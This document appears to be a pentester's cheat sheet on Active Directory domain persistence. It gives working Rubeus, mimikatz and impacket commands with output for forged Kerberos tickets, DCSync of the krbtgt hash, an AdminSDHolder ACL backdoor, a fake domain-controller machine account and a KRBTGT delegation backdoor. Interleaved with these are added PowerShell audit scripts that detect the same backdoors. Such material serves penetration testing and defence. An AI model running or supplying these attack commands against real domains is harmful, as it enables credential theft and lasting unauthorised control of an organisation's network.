Dominance
Silver Ticket
Cmd > Rubeus.exe s4u /domain:megacorp.local /dc:dc1.megacorp.local /user:SRV01$ /rc4:fc525c9683e8fe067095ba2ddc971889 /altservice:http/srv01.megacorp.local /impersonateuser:Administrator /self /ptt
Golden Ticket
Cmd > .\mimikatz.exe "kerberos::golden /domain:megacorp.local /user:snovvcrash /sid:<SID> /krbtgt:<NTHASH> /ptt [/startoffset:-10 /endin:60 /renewmax:10080]" "exit"
Cmd > .\mimikatz.exe "lsadump::dcsync /user:megacorp.local\krbtgt /domain:megacorp.local" "exit"
Diamond Ticket
$ ticketer.py -request -user lowpriv -password 'Passw0rd!' -domain megacorp.local -domain-sid S-1-5-21-4266912945-3985045794-2943778634 -aesKey <AES_KEY> [-groups '512,513,516,518,519,520'] [-user-id 1337] [-duration 87600] snovvcrash
Sapphire Ticket
$ ticketer.py -request -user lowpriv -password 'Passw0rd!' -impersonate administrator -domain megacorp.local -domain-sid S-1-5-21-4266912945-3985045794-2943778634 -nthash <NT_HASH> -aesKey <AES_KEY> administrator
AdminSDHolder Modification
Create a Backdoor
Add a new domain user or grant an existing user GenericAll permissions for the AdminSDHolder container:
PV3 > Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=megacorp,DC=local" -TargetDomain megacorp.local -PrincipalIdentity snovvcrash -PrincipalDomain megacorp.local -Rights All -Verbose
Check that granting AdminSDHolder permissions was successful (it may take 60+ minutes for the security ACLs to get updated for that user):
PV3 > Get-DomainUser snovvcrash | select objectsid
S-1-5-21-2284550090-1208917427-1204316795-9824
PV3 > Get-DomainObjectAcl -Identity "CN=AdminSDHolder,CN=System,DC=megacorp,DC=local" -Domain megacorp.local -ResolveGUIDs | ? {$_.SecurityIdentifier -eq "S-1-5-21-2284550090-1208917427-1204316795-9824"}
AceType : AccessAllowed
ObjectDN : CN=AdminSDHolder,CN=System,DC=megacorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID :
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2284550090-1208917427-1204316795-9824
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
Now you can add yourself (the "snovvcrash" user) to the Domain Admins group at any time and do stuff (actually, adding the user to Domain Admins every time is not necessary, as the AdminCount attribute will stay 1 anyway once the backdoor user has been added to a protected group for the first time):
PV3 > Add-DomainGroupMember -Identity "Domain Admins" -Members snovvcrash
PV3 > Get-DomainObjectAcl -Identity "Domain Admins" -Domain megacorp.local -ResolveGUIDs | ? {$_.SecurityIdentifier -eq "S-1-5-21-2284550090-1208917427-1204316795-9824"}
AceType : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=megacorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-2284550090-1208917427-1204316795-512
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2284550090-1208917427-1204316795-9824
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
PV3 > Remove-DomainGroupMember -Identity "Domain Admins" -Members snovvcrash
PV3 > Get-DomainUser snovvcrash | select admincount
admincount
----------
1
Remove the Backdoor
Disable or remove the account (if a new user was created):
PS > net user snovvcrash /domain /active:no
PS > net user snovvcrash /domain /del
Remove the user's ACE from the AdminSDHolder container via GUI (ADUC, dsa.msc).
Clear the AdminCount attribute (it will be reset if the user is still in the AdminSDHolder container):
PV3 > Set-DomainObject -Identity snovvcrash -Domain megacorp.local -Clear admincount -Verbose
Or
PS > Get-ADUser snovvcrash | Set-ADObject -Clear admincount
Fix the inheritance rules:
PS > [bool]$isProtected = $false
PS > [bool]$PreserveInheritance = $true
PS > [string]$dn = (Get-ADUser snovvcrash).DistinguishedName
PS > $user = [ADSI]"LDAP://$dn"
PS > $acl = $user.objectSecurity
PS > $acl.AreAccessRulesProtected
True # proceed if True
PS > $acl.SetAccessRuleProtection($isProtected, $PreserveInheritance)
PS > $inherited = $acl.AreAccessRulesProtected
PS > $user.commitchanges()
PS > $acl.AreAccessRulesProtected
False
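A defender-side counterpart to the two steps above, added here as an example and not part of the original notes: it lists write-class ACEs on AdminSDHolder held by anyone other than the expected administrative principals, and then finds accounts still stamped adminCount=1 that SDProp no longer protects (the orphaned state the inheritance fix above repairs). It assumes the RSAT ActiveDirectory module and a session that can read the domain; the list of protected groups is the well-known default set and may differ in a domain that has tuned dsHeuristics.

```powershell
# Added audit script (not from the original notes). Assumes the RSAT
# ActiveDirectory module is installed and the session can read the domain.
Import-Module ActiveDirectory

$domain     = Get-ADDomain
$nb         = $domain.NetBIOSName
$adminSDHDN = "CN=AdminSDHolder,CN=System,$($domain.DistinguishedName)"
$R          = [System.DirectoryServices.ActiveDirectoryRights]

# --- 1. Who holds write-class rights on the AdminSDHolder template? ---------
# Only these principals are expected to be able to modify it.
$trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
             "$nb\Domain Admins", "$nb\Enterprise Admins")

$acl = Get-Acl -Path "AD:\$adminSDHDN"
$writeAces = $acl.Access | Where-Object {
    $_.AccessControlType -eq 'Allow' -and
    $trusted -notcontains $_.IdentityReference.Value -and (
        $_.ActiveDirectoryRights.HasFlag($R::GenericAll)   -or
        $_.ActiveDirectoryRights.HasFlag($R::GenericWrite) -or
        $_.ActiveDirectoryRights.HasFlag($R::WriteDacl)    -or
        $_.ActiveDirectoryRights.HasFlag($R::WriteOwner)   -or
        # WriteProperty with an empty ObjectType means "all properties";
        # property-scoped writes (e.g. Cert Publishers -> userCertificate)
        # are deliberately left out of this quick check to keep it quiet.
        ($_.ActiveDirectoryRights.HasFlag($R::WriteProperty) -and
         $_.ObjectType -eq [guid]::Empty)
    )
}
Write-Output "== Unexpected write-class ACEs on $adminSDHDN =="
$writeAces | Select-Object IdentityReference, ActiveDirectoryRights, IsInherited

# --- 2. Accounts stamped adminCount=1 that are no longer protected ----------
# Protected set = recursive members of the protected groups (resolved
# server-side with LDAP_MATCHING_RULE_IN_CHAIN) plus the two directly
# protected users. Enterprise/Schema Admins only exist in the forest root,
# so a missing group simply yields no members here.
$protectedGroups = 'Administrators', 'Account Operators', 'Backup Operators',
    'Print Operators', 'Server Operators', 'Replicator', 'Domain Admins',
    'Domain Controllers', 'Enterprise Admins', 'Schema Admins',
    'Read-only Domain Controllers'
$protected = @{}
foreach ($g in $protectedGroups) {
    foreach ($grp in (Get-ADGroup -Filter "Name -eq '$g'")) {
        $chain = "(memberOf:1.2.840.113556.1.4.1941:=$($grp.DistinguishedName))"
        Get-ADUser -LDAPFilter $chain |
            ForEach-Object { $protected[$_.SID.Value] = $true }
    }
}
foreach ($u in 'Administrator', 'krbtgt') {
    $protected[(Get-ADUser -Identity $u).SID.Value] = $true
}

Write-Output "== adminCount=1 users outside every protected group =="
Get-ADUser -Filter 'adminCount -eq 1' -Properties adminCount |
    Where-Object { -not $protected.ContainsKey($_.SID.Value) } |
    ForEach-Object {
        # An orphan whose DACL is still protected never regained inheritance,
        # which is exactly what SetAccessRuleProtection($false, $true) fixes.
        $userAcl = Get-Acl -Path "AD:\$($_.DistinguishedName)"
        [pscustomobject]@{
            SamAccountName     = $_.SamAccountName
            DistinguishedName  = $_.DistinguishedName
            InheritanceBlocked = $userAcl.AreAccessRulesProtected
        }
    }
```

The first half is the check that catches the Add-DomainObjectAcl step directly: a plain user with GenericAll on AdminSDHolder has no legitimate reason to be there. The second half catches the residue of a removed backdoor (or of ordinary admin churn), and because SDProp re-stamps members on its schedule, an account that keeps showing up here after the next run is genuinely orphaned rather than just not yet processed.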
SERVER_TRUST_ACCOUNT
When DA is owned (or any other account with the DS-Install-Replica permission), you can create a fake machine account (or use an existing real machine account), set the SERVER_TRUST_ACCOUNT bit for it and perform DCSync on behalf of this account to regain domain dominance.
1. Create a fake machine account:
PM > New-MachineAccount -MachineAccount FakeMachine -Password $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) -Verbose
PV3 > Get-DomainComputer FakeMachine | select name,primarygroupid,useraccountcontrol
name primarygroupid useraccountcontrol
---- -------------- ------------------
FakeMachine 515 WORKSTATION_TRUST_ACCOUNT
2. Set the SERVER_TRUST_ACCOUNT bit:
PV3 > Set-DomainObject FakeMachine -Set @{useraccountcontrol=8192}
PV3 > Get-DomainComputer FakeMachine | select name,primarygroupid,useraccountcontrol
name primarygroupid useraccountcontrol
---- -------------- ------------------
FakeMachine 516 SERVER_TRUST_ACCOUNT
3. Perform DCSync:
$ secretsdump.py MEGACORP/'FakeMachine$:Passw0rd!'@DC01.megacorp.local -dc-ip 192.168.1.11 -just-dc-user 'MEGACORP\krbtgt'
4. Clean up:
PV3 > Set-DomainObject FakeMachine -Set @{useraccountcontrol=4096}
Or
PM > Remove-MachineAccount -MachineAccount FakeMachine
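The same technique seen from the other side, as an added example that is not part of the original notes: every computer object carrying the SERVER_TRUST_ACCOUNT bit or a domain-controller primaryGroupID is compared against the accounts the domain actually knows as DCs, so a FakeMachine sitting in CN=Computers with useraccountcontrol=8192 stands out. It assumes the RSAT ActiveDirectory module; the LDAP bitwise-AND matching rule OID 1.2.840.113556.1.4.803 does the flag test server-side.

```powershell
# Added audit script (not from the original notes). Assumes the RSAT
# ActiveDirectory module and an account that can read computer objects.
Import-Module ActiveDirectory

$SERVER_TRUST_ACCOUNT = 0x2000   # 8192: the bit set in step 2 above

# Accounts the domain itself considers DCs (writable and read-only).
$realDcDNs = Get-ADDomainController -Filter * |
    Select-Object -ExpandProperty ComputerObjectDN

# Server-side filter: SERVER_TRUST_ACCOUNT set via the LDAP bitwise-AND rule,
# or a primaryGroupID of 516 (Domain Controllers) / 521 (Read-only Domain
# Controllers), which the DC promotes to automatically once the bit is set.
$ldap = '(|(userAccountControl:1.2.840.113556.1.4.803:=8192)' +
        '(primaryGroupID=516)(primaryGroupID=521))'

Get-ADComputer -LDAPFilter $ldap -Properties userAccountControl, primaryGroupID, whenChanged |
    Where-Object { $realDcDNs -notcontains $_.DistinguishedName } |
    Select-Object Name, DistinguishedName, primaryGroupID, whenChanged,
        @{ Name = 'UAC';         Expression = { '0x{0:X}' -f $_.userAccountControl } },
        @{ Name = 'ServerTrust'; Expression = { [bool]($_.userAccountControl -band $SERVER_TRUST_ACCOUNT) } }
```

Any row this prints is either a DC promotion in progress or a problem. On the event side, the useraccountcontrol change in step 2 lands in a 4742 ("A computer account was changed") event on the DC, and the DCSync in step 3 shows up as 4662 events for the replication control-access rights coming from a machine account that is not a DC.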
KRBTGT Constrained Delegation
# create a new service account (or abuse an existing one)
PM > New-MachineAccount -Domain megacorp.local -DomainController DC01.megacorp.local -MachineAccount FakeMachine -Password $(ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force) -Verbose
# set UAC to be 'WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION'
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{useraccountcontrol=16781312} -Verbose
# set the krbtgt SPN for delegation
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{"msDS-AllowedToDelegateTo"=@("krbtgt/MEGACORP")} -Verbose
# request TGS via S4U (will act as a TGT of the impersonated user)
PS > .\Rubeus.exe s4u /domain:megacorp.net /user:FakeMachine$ /rc4:b2bdbe60565b677dfb133866722317fd /impersonateuser:snovvcrash /msdsspn:krbtgt/MEGACORP /ptt
# cleanup: remove the SPN for delegation
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Clear msDS-AllowedToDelegateTo -Verbose
# cleanup: back to UAC 'WORKSTATION_TRUST_ACCOUNT'
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{useraccountcontrol=4096} -Verbose
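An audit for the KRBTGT delegation backdoor above, added as an example and not part of the original notes: it enumerates every object with an msDS-AllowedToDelegateTo list and reports whether the list contains a krbtgt/ SPN and whether TRUSTED_TO_AUTH_FOR_DELEGATION (protocol transition, the 0x1000000 half of the 16781312 value set above) is enabled, since it is that combination that lets an S4U request come back as something usable as a TGT. It assumes the RSAT ActiveDirectory module.

```powershell
# Added audit script (not from the original notes). Assumes the RSAT
# ActiveDirectory module and read access to user and computer objects.
Import-Module ActiveDirectory

# 16781312 = 0x1001000 = WORKSTATION_TRUST_ACCOUNT (0x1000) |
#                        TRUSTED_TO_AUTH_FOR_DELEGATION (0x1000000)
$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000

# Users and computers alike: the attribute can live on either class.
Get-ADObject -LDAPFilter '(msDS-AllowedToDelegateTo=*)' `
    -Properties sAMAccountName, userAccountControl, 'msDS-AllowedToDelegateTo', whenChanged |
    ForEach-Object {
        $targets = @($_.'msDS-AllowedToDelegateTo')
        # krbtgt/<REALM> as a delegation target has no legitimate use.
        $krbtgt  = @($targets | Where-Object { $_ -match '^krbtgt/' })
        [pscustomobject]@{
            SamAccountName     = $_.sAMAccountName
            ObjectClass        = $_.ObjectClass
            DelegatesToKrbtgt  = ($krbtgt.Count -gt 0)
            ProtocolTransition = [bool]($_.userAccountControl -band $TRUSTED_TO_AUTH_FOR_DELEGATION)
            Targets            = ($targets -join ', ')
            WhenChanged        = $_.whenChanged
        }
    } |
    Sort-Object DelegatesToKrbtgt, ProtocolTransition -Descending |
    Format-Table -AutoSize
```

Rows with DelegatesToKrbtgt set are the ones to act on immediately; rows with ProtocolTransition but ordinary targets are the wider constrained-delegation surface and deserve a second look. Because the backdoor lives purely in two attributes, a SACL on msDS-AllowedToDelegateTo and userAccountControl (surfacing as 5136 directory-object-modified events) catches both the setup and the cleanup writes shown above.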